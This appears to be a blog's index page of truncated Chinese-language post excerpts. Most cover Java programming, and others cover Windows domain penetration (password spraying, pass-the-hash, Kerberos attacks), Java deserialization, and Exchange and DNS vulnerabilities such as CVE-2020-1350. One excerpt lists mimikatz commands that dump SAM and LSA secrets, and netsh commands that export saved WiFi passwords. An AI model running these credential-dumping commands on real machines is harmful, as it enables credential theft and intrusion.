众所周知Java是一个跨平台的语言，不同的操作系统有着完全不一样的文件系统和特性。JDK会根据不同的操作系统(AIX,Linux,MacOSX,Solaris,Unix,Windows)编译成不同的版本。在Java语言中对文件的任何操作最终都是通过JNI调用C语言函数实现的。Java为了能够实现跨操作系统对文件进行操作抽象了一个叫做FileSystem的对象出来，不同的操作系统只需要实现起抽象出来的文件操作方法即可实现跨平台的文件操作了。参考文章：Java 文件系统...

搭建域环境 域内认证之Kerberos协议详解 Windows域的管理 域内权限解读 LDAP中常见名称(CN/DN/OU) 域内创建机器用户 更改域环境密码安全策略 域中的ACL访问控制策略和组策略域内工具：ADSI编辑器 域查询工具Adfind的用法域内渗透：域内用户枚举和密码喷洒攻击(Password Spraying) 域渗透之委派攻击 票据传递攻击(Pass the Ticket,PtT) 哈希传递攻击(Pass-the-Hash,PtH) AS-REP Roa

在获取了Windows系统权限后，我们就需要尽可能多的收集这台机器上的各种信息，各种密码，如：Windows账号密码：传送门——>Windows中获取用户密码浏览器账号密码：VPN账号密码：mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exitWIFI账号密码#显示连接过的WIFInetsh wlan show profilesnetsh wlan export .

目录序列化和反序列化JAVA WEB中的序列化和反序列化对象序列化和反序列示例序列化和反序列化序列化 (Serialization)：将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间，对象将其当前状态写入到临时或持久性存储区。反序列化：从存储区中读取该数据，并将其还原为对象的过程，称为反序列化。简单的说，序列化和反序列化就是：把对象转换为字节序列的过程称为对象的序列化 把字节序列恢复为对象的过程称为对象的反序列化对象序列化的用途：把对象的字节序列永久地保

ysoserial.jarysoserial是集合了各种java反序列化payload的工具，项目地址：https://github.com/frohoff/ysoserial

漏洞描述 2020年7月15日，微软发布补丁修复了一个标注为远程代码执行的DNS Server漏洞，官方分类为“可蠕虫级”高危漏洞，易受攻击的漏洞有可能通过恶意软件在易受攻击的计算机之间传播，而无需用户干预。CVSS评分10分（即高危且易利用），漏洞编号CVE-2020-1350。未经身份验证的攻击者可以发送特殊构造的数据包到目标DNS Server来利用此漏洞，成功利用此漏洞可能达到远程代码执行的效果。如果域控制器上存在DNS服务，攻击者可利用此漏洞获取到域控制器的系统权限。另外，DNS服务器一..

Collections 是集合类的一个工具类，其提供了一系列静态方法，用于对集合中元素进行排序、搜索以及线程安全等各种操作1) 排序(Sort) 使用sort方法可以根据元素的自然顺序，对指定列表进行排序。列表中的所有元素都必须实现 Comparable 接口。或此列表内的所有元素都必须是使用指定比较器可相互比较的 Collections.sort(list , new Comparator(){ } );2) 混排（Shuffling） 混排算法所做的正好与 sort 相反: 它打乱在...

CN(Common Name) 通用名称：为用户名或服务器名，最长可以到80个字符，可以为中文 OU(Organization Unit)组织单元：最多可以有四级，每级最长32个字符，可以为中文 DC(Domain Component) 域组件这些都是X.500目录规范的所有部门，它定义了LDAP目录中的节点DN(Distinguished Name)区分名：区分名是唯一的，DN 有三个属性，分别是 CN、OU、DCCN, OU, DC 都是 LDAP 连接服务器的端字符串中的区别名称（DN,.

参考文章：JAVA中IO流详解

在实际工作项目过程中，经常会碰到乱码的情况。本节来简单讲一下java的编码问题如下代码import java.io.UnsupportedEncodingException;import java.nio.charset.Charset;import java.nio.charset.StandardCharsets;public class Main { public static void main(String[] args) throws UnsupportedEncodin

在Java的反序列化远程代码执行过程中，最终就是通过调用Runtime类的exec函数来执行系统命令。

在渗透测试过程中，经常会碰到使用Exchange邮箱的系统。但是Exchangeweb端是无法爆破的，可以爆破客户端。Invoke-PasswordSprayEWSMailSniper

SharpShooter项目地址：https://github.com/mdsecactivebreach/SharpShooter未完待续

以下介绍在Windows下安装Go语言环境先去下载Go安装包Go官网下载地址：https://golang.org/dl/ Go官方镜像站（推荐）：https://golang.google.cn/dl/下载完之后双击安装即可参考文章：https://www.cnblogs.com/wqzn/p/11730052.html...

先去下载Exchange Server2013，地址：Exchange Server 2013 (x64) - DVD (Multilanguage)

漏洞描述:漏洞产生的主要原因就是在Exchange ECP组件中发现，邮件服务在安装的过程中不会随机生成秘钥，也就是说所有默认安装的Exchange服务器中的validationKey和decryptionKey的值都是相同的，攻击者可以利用静态秘钥对服务器发起攻击，在服务器中以SYSTEM权限远程执行代码。漏洞影响版本：Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 Microsoft Exchange Serve